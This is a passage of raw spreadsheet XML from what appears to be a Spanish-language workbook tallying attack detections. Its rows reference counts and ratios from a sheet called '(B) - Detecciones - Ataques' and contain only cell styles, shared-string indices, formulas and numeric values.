      <c r="BJ17" s="278"/>
      <c r="BK17" s="278"/>
      <c r="BL17" s="278"/>
      <c r="BM17" s="278"/>
      <c r="BN17" s="278"/>
      <c r="BO17" s="278"/>
    </row>
    <row r="18" ht="60.0" customHeight="1">
      <c r="B18" s="142" t="s">
        <v>204</v>
      </c>
      <c r="C18" s="144" t="s">
        <v>12</v>
      </c>
      <c r="D18" s="143" t="s">
        <v>206</v>
      </c>
      <c r="E18" s="145" t="s">
        <v>1506</v>
      </c>
      <c r="F18" s="280">
        <f>'(B) - Detecciones - Ataques'!P9</f>
        <v>1</v>
      </c>
      <c r="G18" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ9</f>
        <v>0</v>
      </c>
      <c r="H18" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ9</f>
        <v>0</v>
      </c>
      <c r="I18" s="271">
        <f>'(B) - Detecciones - Ataques'!AS9</f>
        <v>0</v>
      </c>
      <c r="J18" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ9</f>
        <v>0</v>
      </c>
      <c r="K18" s="271">
        <f>'(B) - Detecciones - Ataques'!BP9</f>
        <v>0</v>
      </c>
      <c r="L18" s="281">
        <f>'(B) - Detecciones - Ataques'!BW9</f>
        <v>0</v>
      </c>
      <c r="M18" s="271">
        <f>'(B) - Detecciones - Ataques'!CM9</f>
        <v>0</v>
      </c>
      <c r="N18" s="281">
        <f>'(B) - Detecciones - Ataques'!CT9</f>
        <v>0</v>
      </c>
      <c r="O18" s="280">
        <f>'(B) - Detecciones - Ataques'!EC9</f>
        <v>153</v>
      </c>
      <c r="P18" s="281">
        <f>'(B) - Detecciones - Ataques'!ED9</f>
        <v>153</v>
      </c>
      <c r="Q18" s="282" t="s">
        <v>13</v>
      </c>
      <c r="T18" s="283" t="s">
        <v>658</v>
      </c>
      <c r="U18" s="275">
        <f t="shared" si="19"/>
        <v>80390</v>
      </c>
      <c r="V18" s="275">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="W18" s="284">
        <f t="shared" si="2"/>
        <v>0.00004975743252</v>
      </c>
      <c r="X18" s="275">
        <f t="shared" si="3"/>
        <v>362</v>
      </c>
      <c r="Y18" s="285">
        <f t="shared" si="4"/>
        <v>0.004503047643</v>
      </c>
      <c r="Z18" s="278"/>
      <c r="AA18" s="283" t="s">
        <v>658</v>
      </c>
      <c r="AB18" s="275">
        <f t="shared" si="20"/>
        <v>80234</v>
      </c>
      <c r="AC18" s="275">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="AD18" s="284">
        <f t="shared" si="6"/>
        <v>0.00004985417653</v>
      </c>
      <c r="AE18" s="275">
        <f t="shared" si="7"/>
        <v>352</v>
      </c>
      <c r="AF18" s="285">
        <f t="shared" si="8"/>
        <v>0.004387167535</v>
      </c>
      <c r="AG18" s="278"/>
      <c r="AH18" s="278"/>
      <c r="AI18" s="278"/>
      <c r="AJ18" s="278"/>
      <c r="AK18" s="278"/>
      <c r="AL18" s="287" t="s">
        <v>232</v>
      </c>
      <c r="AM18" s="275">
        <f t="shared" si="9"/>
        <v>3</v>
      </c>
      <c r="AN18" s="275">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="AO18" s="284">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AP18" s="275">
        <f t="shared" si="12"/>
        <v>0</v>
      </c>
      <c r="AQ18" s="285">
        <f t="shared" si="13"/>
        <v>0</v>
      </c>
      <c r="AR18" s="278"/>
      <c r="AS18" s="287" t="s">
        <v>232</v>
      </c>
      <c r="AT18" s="275">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AU18" s="275">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="AV18" s="284" t="str">
        <f t="shared" si="21"/>
        <v>-</v>
      </c>
      <c r="AW18" s="275">
        <f t="shared" si="17"/>
        <v>0</v>
      </c>
      <c r="AX18" s="285" t="str">
        <f t="shared" si="18"/>
        <v>-</v>
      </c>
      <c r="AY18" s="278"/>
      <c r="AZ18" s="278"/>
      <c r="BA18" s="278"/>
      <c r="BB18" s="278"/>
      <c r="BC18" s="278"/>
      <c r="BD18" s="278"/>
      <c r="BE18" s="278"/>
      <c r="BF18" s="278"/>
      <c r="BG18" s="278"/>
      <c r="BH18" s="278"/>
      <c r="BI18" s="278"/>
      <c r="BJ18" s="278"/>
      <c r="BK18" s="278"/>
      <c r="BL18" s="278"/>
      <c r="BM18" s="278"/>
      <c r="BN18" s="278"/>
      <c r="BO18" s="278"/>
    </row>
    <row r="19" ht="60.0" customHeight="1">
      <c r="B19" s="142" t="s">
        <v>204</v>
      </c>
      <c r="C19" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D19" s="143" t="s">
        <v>222</v>
      </c>
      <c r="E19" s="145" t="s">
        <v>227</v>
      </c>
      <c r="F19" s="280">
        <f>'(B) - Detecciones - Ataques'!P10</f>
        <v>1</v>
      </c>
      <c r="G19" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ10</f>
        <v>0</v>
      </c>
      <c r="H19" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ10</f>
        <v>0</v>
      </c>
      <c r="I19" s="271">
        <f>'(B) - Detecciones - Ataques'!AS10</f>
        <v>0</v>
      </c>
      <c r="J19" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ10</f>
        <v>0</v>
      </c>
      <c r="K19" s="271">
        <f>'(B) - Detecciones - Ataques'!BP10</f>
        <v>0</v>
      </c>
      <c r="L19" s="281">
        <f>'(B) - Detecciones - Ataques'!BW10</f>
        <v>0</v>
      </c>
      <c r="M19" s="271">
        <f>'(B) - Detecciones - Ataques'!CM10</f>
        <v>0</v>
      </c>
      <c r="N19" s="281">
        <f>'(B) - Detecciones - Ataques'!CT10</f>
        <v>0</v>
      </c>
      <c r="O19" s="280">
        <f>'(B) - Detecciones - Ataques'!EC10</f>
        <v>0</v>
      </c>
      <c r="P19" s="281">
        <f>'(B) - Detecciones - Ataques'!ED10</f>
        <v>0</v>
      </c>
      <c r="Q19" s="282" t="s">
        <v>112</v>
      </c>
      <c r="T19" s="283" t="s">
        <v>351</v>
      </c>
      <c r="U19" s="275">
        <f t="shared" si="19"/>
        <v>18</v>
      </c>
      <c r="V19" s="275">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="W19" s="284">
        <f t="shared" si="2"/>
        <v>0.1111111111</v>
      </c>
      <c r="X19" s="275">
        <f t="shared" si="3"/>
        <v>6</v>
      </c>
      <c r="Y19" s="285">
        <f t="shared" si="4"/>
        <v>0.3333333333</v>
      </c>
      <c r="Z19" s="278"/>
      <c r="AA19" s="283" t="s">
        <v>351</v>
      </c>
      <c r="AB19" s="275">
        <f t="shared" si="20"/>
        <v>7</v>
      </c>
      <c r="AC19" s="275">
        <f t="shared" si="5"/>
        <v>2</v>
      </c>
      <c r="AD19" s="284">
        <f t="shared" si="6"/>
        <v>0.2857142857</v>
      </c>
      <c r="AE19" s="275">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="AF19" s="285">
        <f t="shared" si="8"/>
        <v>0.4285714286</v>
      </c>
      <c r="AG19" s="278"/>
      <c r="AH19" s="278"/>
      <c r="AI19" s="278"/>
      <c r="AJ19" s="278"/>
      <c r="AK19" s="278"/>
      <c r="AL19" s="287" t="s">
        <v>232</v>
      </c>
      <c r="AM19" s="275">
        <f t="shared" si="9"/>
        <v>3</v>
      </c>
      <c r="AN19" s="275">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="AO19" s="284">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AP19" s="275">
        <f t="shared" si="12"/>
        <v>0</v>
      </c>
      <c r="AQ19" s="285">
        <f t="shared" si="13"/>
        <v>0</v>
      </c>
      <c r="AR19" s="278"/>
      <c r="AS19" s="287" t="s">
        <v>232</v>
      </c>
      <c r="AT19" s="275">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AU19" s="275">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="AV19" s="284" t="str">
        <f t="shared" si="21"/>
        <v>-</v>
      </c>
      <c r="AW19" s="275">
        <f t="shared" si="17"/>
        <v>0</v>
      </c>
      <c r="AX19" s="285" t="str">
        <f t="shared" si="18"/>
        <v>-</v>
      </c>
      <c r="AY19" s="278"/>
      <c r="AZ19" s="278"/>
      <c r="BA19" s="278"/>
      <c r="BB19" s="278"/>
      <c r="BC19" s="278"/>
      <c r="BD19" s="278"/>
      <c r="BE19" s="278"/>
      <c r="BF19" s="278"/>
      <c r="BG19" s="278"/>
      <c r="BH19" s="278"/>
      <c r="BI19" s="278"/>
      <c r="BJ19" s="278"/>
      <c r="BK19" s="278"/>
      <c r="BL19" s="278"/>
      <c r="BM19" s="278"/>
      <c r="BN19" s="278"/>
      <c r="BO19" s="278"/>
    </row>
    <row r="20" ht="60.0" customHeight="1">
      <c r="B20" s="142" t="s">
        <v>204</v>
      </c>
      <c r="C20" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D20" s="143" t="s">
        <v>232</v>
      </c>
      <c r="E20" s="145" t="s">
        <v>237</v>
      </c>
      <c r="F20" s="280">
        <f>'(B) - Detecciones - Ataques'!P11</f>
        <v>1</v>
      </c>
      <c r="G20" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ11</f>
        <v>0</v>
      </c>
      <c r="H20" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ11</f>
        <v>0</v>
      </c>
      <c r="I20" s="271">
        <f>'(B) - Detecciones - Ataques'!AS11</f>
        <v>0</v>
      </c>
      <c r="J20" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ11</f>
        <v>0</v>
      </c>
      <c r="K20" s="271">
        <f>'(B) - Detecciones - Ataques'!BP11</f>
        <v>0</v>
      </c>
      <c r="L20" s="281">
        <f>'(B) - Detecciones - Ataques'!BW11</f>
        <v>0</v>
      </c>
      <c r="M20" s="271">
        <f>'(B) - Detecciones - Ataques'!CM11</f>
        <v>0</v>
      </c>
      <c r="N20" s="281">
        <f>'(B) - Detecciones - Ataques'!CT11</f>
        <v>0</v>
      </c>
      <c r="O20" s="280">
        <f>'(B) - Detecciones - Ataques'!EC11</f>
        <v>0</v>
      </c>
      <c r="P20" s="281">
        <f>'(B) - Detecciones - Ataques'!ED11</f>
        <v>0</v>
      </c>
      <c r="Q20" s="282" t="s">
        <v>112</v>
      </c>
      <c r="T20" s="283" t="s">
        <v>397</v>
      </c>
      <c r="U20" s="275">
        <f t="shared" si="19"/>
        <v>10</v>
      </c>
      <c r="V20" s="275">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="W20" s="284">
        <f t="shared" si="2"/>
        <v>0.1</v>
      </c>
      <c r="X20" s="275">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="Y20" s="285">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="Z20" s="278"/>
      <c r="AA20" s="283" t="s">
        <v>397</v>
      </c>
      <c r="AB20" s="275">
        <f t="shared" si="20"/>
        <v>6</v>
      </c>
      <c r="AC20" s="275">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="AD20" s="284">
        <f t="shared" si="6"/>
        <v>0.1666666667</v>
      </c>
      <c r="AE20" s="275">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="AF20" s="285">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="AG20" s="278"/>
      <c r="AH20" s="278"/>
      <c r="AI20" s="278"/>
      <c r="AJ20" s="278"/>
      <c r="AK20" s="278"/>
      <c r="AL20" s="287" t="s">
        <v>264</v>
      </c>
      <c r="AM20" s="275">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AN20" s="275">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
      <c r="AO20" s="284">
        <f t="shared" si="11"/>
        <v>1</v>
      </c>
      <c r="AP20" s="275">
        <f t="shared" si="12"/>
        <v>0</v>
      </c>
      <c r="AQ20" s="285">
        <f t="shared" si="13"/>
        <v>0</v>
      </c>
      <c r="AR20" s="278"/>
      <c r="AS20" s="287" t="s">
        <v>264</v>
      </c>
      <c r="AT20" s="275">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
      <c r="AU20" s="275">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="AV20" s="284">
        <f t="shared" si="21"/>
        <v>1</v>
      </c>
      <c r="AW20" s="275">
        <f t="shared" si="17"/>
        <v>0</v>
      </c>
      <c r="AX20" s="285">
        <f t="shared" si="18"/>
        <v>0</v>
      </c>
      <c r="AY20" s="278"/>
      <c r="AZ20" s="278"/>
      <c r="BA20" s="278"/>
      <c r="BB20" s="278"/>
      <c r="BC20" s="278"/>
      <c r="BD20" s="278"/>
      <c r="BE20" s="278"/>
      <c r="BF20" s="278"/>
      <c r="BG20" s="278"/>
      <c r="BH20" s="278"/>
      <c r="BI20" s="278"/>
      <c r="BJ20" s="278"/>
      <c r="BK20" s="278"/>
      <c r="BL20" s="278"/>
      <c r="BM20" s="278"/>
      <c r="BN20" s="278"/>
      <c r="BO20" s="278"/>
    </row>
    <row r="21" ht="60.0" customHeight="1">
      <c r="B21" s="142" t="s">
        <v>204</v>
      </c>
      <c r="C21" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D21" s="143" t="s">
        <v>232</v>
      </c>
      <c r="E21" s="145" t="s">
        <v>245</v>
      </c>
      <c r="F21" s="280">
        <f>'(B) - Detecciones - Ataques'!P12</f>
        <v>1</v>
      </c>
      <c r="G21" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ12</f>
        <v>0</v>
      </c>
      <c r="H21" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ12</f>
        <v>0</v>
      </c>
      <c r="I21" s="271">
        <f>'(B) - Detecciones - Ataques'!AS12</f>
        <v>0</v>
      </c>
      <c r="J21" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ12</f>
        <v>0</v>
      </c>
      <c r="K21" s="271">
        <f>'(B) - Detecciones - Ataques'!BP12</f>
        <v>0</v>
      </c>
      <c r="L21" s="281">
        <f>'(B) - Detecciones - Ataques'!BW12</f>
        <v>0</v>
      </c>
      <c r="M21" s="271">
        <f>'(B) - Detecciones - Ataques'!CM12</f>
        <v>0</v>
      </c>
      <c r="N21" s="281">
        <f>'(B) - Detecciones - Ataques'!CT12</f>
        <v>0</v>
      </c>
      <c r="O21" s="280">
        <f>'(B) - Detecciones - Ataques'!EC12</f>
        <v>0</v>
      </c>
      <c r="P21" s="281">
        <f>'(B) - Detecciones - Ataques'!ED12</f>
        <v>0</v>
      </c>
      <c r="Q21" s="282" t="s">
        <v>112</v>
      </c>
      <c r="T21" s="283" t="s">
        <v>1099</v>
      </c>
      <c r="U21" s="275">
        <f t="shared" si="19"/>
        <v>6</v>
      </c>
      <c r="V21" s="275">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="W21" s="284">
        <f t="shared" si="2"/>
        <v>0.5</v>
      </c>
      <c r="X21" s="275">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="Y21" s="285">
        <f t="shared" si="4"/>
        <v>0.5</v>
      </c>
      <c r="Z21" s="278"/>
      <c r="AA21" s="283" t="s">
        <v>1099</v>
      </c>
      <c r="AB21" s="275">
        <f t="shared" si="20"/>
        <v>4</v>
      </c>
      <c r="AC21" s="275">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="AD21" s="284">
        <f t="shared" si="6"/>
        <v>0.75</v>
      </c>
      <c r="AE21" s="275">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="AF21" s="285">
        <f t="shared" si="8"/>
        <v>0.75</v>
      </c>
      <c r="AG21" s="278"/>
      <c r="AH21" s="278"/>
      <c r="AI21" s="278"/>
      <c r="AJ21" s="278"/>
      <c r="AK21" s="278"/>
      <c r="AL21" s="287" t="s">
        <v>280</v>
      </c>
      <c r="AM21" s="275">
        <f t="shared" si="9"/>
        <v>189</v>
      </c>
      <c r="AN21" s="275">
        <f t="shared" si="10"/>
        <v>76</v>
      </c>
      <c r="AO21" s="284">
        <f t="shared" si="11"/>
        <v>0.4021164021</v>
      </c>
      <c r="AP21" s="275">
        <f t="shared" si="12"/>
        <v>112</v>
      </c>
      <c r="AQ21" s="285">
        <f t="shared" si="13"/>
        <v>0.5925925926</v>
      </c>
      <c r="AR21" s="278"/>
      <c r="AS21" s="287" t="s">
        <v>280</v>
      </c>
      <c r="AT21" s="275">
        <f t="shared" si="14"/>
        <v>189</v>
      </c>
      <c r="AU21" s="275">
        <f t="shared" si="15"/>
        <v>76</v>
      </c>
      <c r="AV21" s="284">
        <f t="shared" si="21"/>
        <v>0.4021164021</v>
      </c>
      <c r="AW21" s="275">
        <f t="shared" si="17"/>
        <v>112</v>
      </c>
      <c r="AX21" s="285">
        <f t="shared" si="18"/>
        <v>0.5925925926</v>
      </c>
      <c r="AY21" s="278"/>
      <c r="AZ21" s="278"/>
      <c r="BA21" s="278"/>
      <c r="BB21" s="278"/>
      <c r="BC21" s="278"/>
      <c r="BD21" s="278"/>
      <c r="BE21" s="278"/>
      <c r="BF21" s="278"/>
      <c r="BG21" s="278"/>
      <c r="BH21" s="278"/>
      <c r="BI21" s="278"/>
      <c r="BJ21" s="278"/>
      <c r="BK21" s="278"/>
      <c r="BL21" s="278"/>
      <c r="BM21" s="278"/>
      <c r="BN21" s="278"/>
      <c r="BO21" s="278"/>
    </row>
    <row r="22" ht="60.0" customHeight="1">
      <c r="B22" s="142" t="s">
        <v>204</v>
      </c>
      <c r="C22" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D22" s="143" t="s">
        <v>232</v>
      </c>
      <c r="E22" s="145" t="s">
        <v>253</v>
      </c>
      <c r="F22" s="280">
        <f>'(B) - Detecciones - Ataques'!P13</f>
        <v>1</v>
      </c>
      <c r="G22" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ13</f>
        <v>0</v>
      </c>
      <c r="H22" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ13</f>
        <v>0</v>
      </c>
      <c r="I22" s="271">
        <f>'(B) - Detecciones - Ataques'!AS13</f>
        <v>0</v>
      </c>
      <c r="J22" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ13</f>
        <v>0</v>
      </c>
      <c r="K22" s="271">
        <f>'(B) - Detecciones - Ataques'!BP13</f>
        <v>0</v>
      </c>
      <c r="L22" s="281">
        <f>'(B) - Detecciones - Ataques'!BW13</f>
        <v>0</v>
      </c>
      <c r="M22" s="271">
        <f>'(B) - Detecciones - Ataques'!CM13</f>
        <v>0</v>
      </c>
      <c r="N22" s="281">
        <f>'(B) - Detecciones - Ataques'!CT13</f>
        <v>0</v>
      </c>
      <c r="O22" s="280">
        <f>'(B) - Detecciones - Ataques'!EC13</f>
        <v>0</v>
      </c>
      <c r="P22" s="281">
        <f>'(B) - Detecciones - Ataques'!ED13</f>
        <v>0</v>
      </c>
      <c r="Q22" s="282" t="s">
        <v>112</v>
      </c>
      <c r="T22" s="283" t="s">
        <v>505</v>
      </c>
      <c r="U22" s="275">
        <f t="shared" si="19"/>
        <v>73080</v>
      </c>
      <c r="V22" s="275">
        <f t="shared" si="1"/>
        <v>169</v>
      </c>
      <c r="W22" s="284">
        <f t="shared" si="2"/>
        <v>0.002312534209</v>
      </c>
      <c r="X22" s="275">
        <f t="shared" si="3"/>
        <v>219</v>
      </c>
      <c r="Y22" s="285">
        <f t="shared" si="4"/>
        <v>0.002996715928</v>
      </c>
      <c r="Z22" s="278"/>
      <c r="AA22" s="283" t="s">
        <v>505</v>
      </c>
      <c r="AB22" s="275">
        <f t="shared" si="20"/>
        <v>73035</v>
      </c>
      <c r="AC22" s="275">
        <f t="shared" si="5"/>
        <v>169</v>
      </c>
      <c r="AD22" s="284">
        <f t="shared" si="6"/>
        <v>0.002313959061</v>
      </c>
      <c r="AE22" s="275">
        <f t="shared" si="7"/>
        <v>219</v>
      </c>
      <c r="AF22" s="285">
        <f t="shared" si="8"/>
        <v>0.002998562333</v>
      </c>
      <c r="AG22" s="278"/>
      <c r="AH22" s="278"/>
      <c r="AI22" s="278"/>
      <c r="AJ22" s="278"/>
      <c r="AK22" s="278"/>
      <c r="AL22" s="287" t="s">
        <v>310</v>
      </c>
      <c r="AM22" s="275">
        <f t="shared" si="9"/>
        <v>2</v>
      </c>
      <c r="AN22" s="275">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="AO22" s="284">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AP22" s="275">
        <f t="shared" si="12"/>
        <v>3</v>
      </c>
      <c r="AQ22" s="285">
        <f t="shared" si="13"/>
        <v>1.5</v>
      </c>
      <c r="AR22" s="278"/>
      <c r="AS22" s="287" t="s">
        <v>310</v>
      </c>
      <c r="AT22" s="275">
        <f t="shared" si="14"/>
        <v>2</v>
      </c>
      <c r="AU22" s="275">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="AV22" s="284">
        <f t="shared" si="21"/>
        <v>0</v>
      </c>
      <c r="AW22" s="275">
        <f t="shared" si="17"/>
        <v>3</v>
      </c>
      <c r="AX22" s="285">
        <f t="shared" si="18"/>
        <v>1.5</v>
      </c>
      <c r="AY22" s="278"/>
      <c r="AZ22" s="278"/>
      <c r="BA22" s="278"/>
      <c r="BB22" s="278"/>
      <c r="BC22" s="278"/>
      <c r="BD22" s="278"/>
      <c r="BE22" s="278"/>
      <c r="BF22" s="278"/>
      <c r="BG22" s="278"/>
      <c r="BH22" s="278"/>
      <c r="BI22" s="278"/>
      <c r="BJ22" s="278"/>
      <c r="BK22" s="278"/>
      <c r="BL22" s="278"/>
      <c r="BM22" s="278"/>
      <c r="BN22" s="278"/>
      <c r="BO22" s="278"/>
    </row>
    <row r="23" ht="60.0" customHeight="1">
      <c r="B23" s="142" t="s">
        <v>261</v>
      </c>
      <c r="C23" s="143" t="s">
        <v>262</v>
      </c>
      <c r="D23" s="143" t="s">
        <v>264</v>
      </c>
      <c r="E23" s="145" t="s">
        <v>268</v>
      </c>
      <c r="F23" s="280">
        <f>'(B) - Detecciones - Ataques'!P14</f>
        <v>1</v>
      </c>
      <c r="G23" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ14</f>
        <v>1</v>
      </c>
      <c r="H23" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ14</f>
        <v>1</v>
      </c>
      <c r="I23" s="271">
        <f>'(B) - Detecciones - Ataques'!AS14</f>
        <v>0</v>
      </c>
      <c r="J23" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ14</f>
        <v>0</v>
      </c>
      <c r="K23" s="271">
        <f>'(B) - Detecciones - Ataques'!BP14</f>
        <v>0</v>
      </c>
      <c r="L23" s="281">
        <f>'(B) - Detecciones - Ataques'!BW14</f>
        <v>0</v>
      </c>
      <c r="M23" s="271">
        <f>'(B) - Detecciones - Ataques'!CM14</f>
        <v>1</v>
      </c>
      <c r="N23" s="281">
        <f>'(B) - Detecciones - Ataques'!CT14</f>
        <v>1</v>
      </c>
      <c r="O23" s="280">
        <f>'(B) - Detecciones - Ataques'!EC14</f>
        <v>0</v>
      </c>
      <c r="P23" s="281">
        <f>'(B) - Detecciones - Ataques'!ED14</f>
        <v>0</v>
      </c>
      <c r="Q23" s="282" t="s">
        <v>13</v>
      </c>
      <c r="T23" s="283" t="s">
        <v>1245</v>
      </c>
      <c r="U23" s="275">
        <f t="shared" si="19"/>
        <v>24</v>
      </c>
      <c r="V23" s="275">
        <f t="shared" si="1"/>
        <v>17</v>
      </c>
      <c r="W23" s="284">
        <f t="shared" si="2"/>
        <v>0.7083333333</v>
      </c>
      <c r="X23" s="275">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="Y23" s="285">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="Z23" s="278"/>
      <c r="AA23" s="283" t="s">
        <v>1245</v>
      </c>
      <c r="AB23" s="275">
        <f t="shared" si="20"/>
        <v>17</v>
      </c>
      <c r="AC23" s="275">
        <f t="shared" si="5"/>
        <v>16</v>
      </c>
      <c r="AD23" s="284">
        <f t="shared" si="6"/>
        <v>0.9411764706</v>
      </c>
      <c r="AE23" s="275">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="AF23" s="285">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="AG23" s="278"/>
      <c r="AH23" s="278"/>
      <c r="AI23" s="278"/>
      <c r="AJ23" s="278"/>
      <c r="AK23" s="278"/>
      <c r="AL23" s="287" t="s">
        <v>324</v>
      </c>
      <c r="AM23" s="275">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AN23" s="275">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="AO23" s="284">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AP23" s="275">
        <f t="shared" si="12"/>
        <v>0</v>
      </c>
      <c r="AQ23" s="285">
        <f t="shared" si="13"/>
        <v>0</v>
      </c>
      <c r="AR23" s="278"/>
      <c r="AS23" s="287" t="s">
        <v>324</v>
      </c>
      <c r="AT23" s="275">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AU23" s="275">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="AV23" s="284" t="str">
        <f t="shared" si="21"/>
        <v>-</v>
      </c>
      <c r="AW23" s="275">
        <f t="shared" si="17"/>
        <v>0</v>
      </c>
      <c r="AX23" s="285" t="str">
        <f t="shared" si="18"/>
        <v>-</v>
      </c>
      <c r="AY23" s="278"/>
      <c r="AZ23" s="278"/>
      <c r="BA23" s="278"/>
      <c r="BB23" s="278"/>
      <c r="BC23" s="278"/>
      <c r="BD23" s="278"/>
      <c r="BE23" s="278"/>
      <c r="BF23" s="278"/>
      <c r="BG23" s="278"/>
      <c r="BH23" s="278"/>
      <c r="BI23" s="278"/>
      <c r="BJ23" s="278"/>
      <c r="BK23" s="278"/>
      <c r="BL23" s="278"/>
      <c r="BM23" s="278"/>
      <c r="BN23" s="278"/>
      <c r="BO23" s="278"/>
    </row>
    <row r="24" ht="60.0" customHeight="1">
      <c r="B24" s="142" t="s">
        <v>261</v>
      </c>
      <c r="C24" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D24" s="143" t="s">
        <v>280</v>
      </c>
      <c r="E24" s="145" t="s">
        <v>284</v>
      </c>
      <c r="F24" s="280">
        <f>'(B) - Detecciones - Ataques'!P15</f>
        <v>1</v>
      </c>
      <c r="G24" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ15</f>
        <v>0</v>
      </c>
      <c r="H24" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ15</f>
        <v>0</v>
      </c>
      <c r="I24" s="271">
        <f>'(B) - Detecciones - Ataques'!AS15</f>
        <v>0</v>
      </c>
      <c r="J24" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ15</f>
        <v>0</v>
      </c>
      <c r="K24" s="271">
        <f>'(B) - Detecciones - Ataques'!BP15</f>
        <v>0</v>
      </c>
      <c r="L24" s="281">
        <f>'(B) - Detecciones - Ataques'!BW15</f>
        <v>0</v>
      </c>
      <c r="M24" s="271">
        <f>'(B) - Detecciones - Ataques'!CM15</f>
        <v>0</v>
      </c>
      <c r="N24" s="281">
        <f>'(B) - Detecciones - Ataques'!CT15</f>
        <v>0</v>
      </c>
      <c r="O24" s="280">
        <f>'(B) - Detecciones - Ataques'!EC15</f>
        <v>1</v>
      </c>
      <c r="P24" s="281">
        <f>'(B) - Detecciones - Ataques'!ED15</f>
        <v>1</v>
      </c>
      <c r="Q24" s="282" t="s">
        <v>13</v>
      </c>
      <c r="T24" s="288" t="s">
        <v>1347</v>
      </c>
      <c r="U24" s="275">
        <f t="shared" si="19"/>
        <v>4</v>
      </c>
      <c r="V24" s="275">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="W24" s="289">
        <f t="shared" si="2"/>
        <v>0.5</v>
      </c>
      <c r="X24" s="275">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="Y24" s="290">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="Z24" s="278"/>
      <c r="AA24" s="288" t="s">
        <v>1347</v>
      </c>
      <c r="AB24" s="275">
        <f t="shared" si="20"/>
        <v>2</v>
      </c>
      <c r="AC24" s="275">
        <f t="shared" si="5"/>
        <v>2</v>
      </c>
      <c r="AD24" s="289">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="AE24" s="275">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="AF24" s="290">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="AG24" s="278"/>
      <c r="AH24" s="278"/>
      <c r="AI24" s="278"/>
      <c r="AJ24" s="278"/>
      <c r="AK24" s="278"/>
      <c r="AL24" s="287" t="s">
        <v>332</v>
      </c>
      <c r="AM24" s="275">
        <f t="shared" si="9"/>
        <v>2</v>
      </c>
      <c r="AN24" s="275">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
      <c r="AO24" s="284">
        <f t="shared" si="11"/>
        <v>0.5</v>
      </c>
      <c r="AP24" s="275">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
      <c r="AQ24" s="285">
        <f t="shared" si="13"/>
        <v>0.5</v>
      </c>
      <c r="AR24" s="278"/>
      <c r="AS24" s="287" t="s">
        <v>332</v>
      </c>
      <c r="AT24" s="275">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AU24" s="275">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="AV24" s="284" t="str">
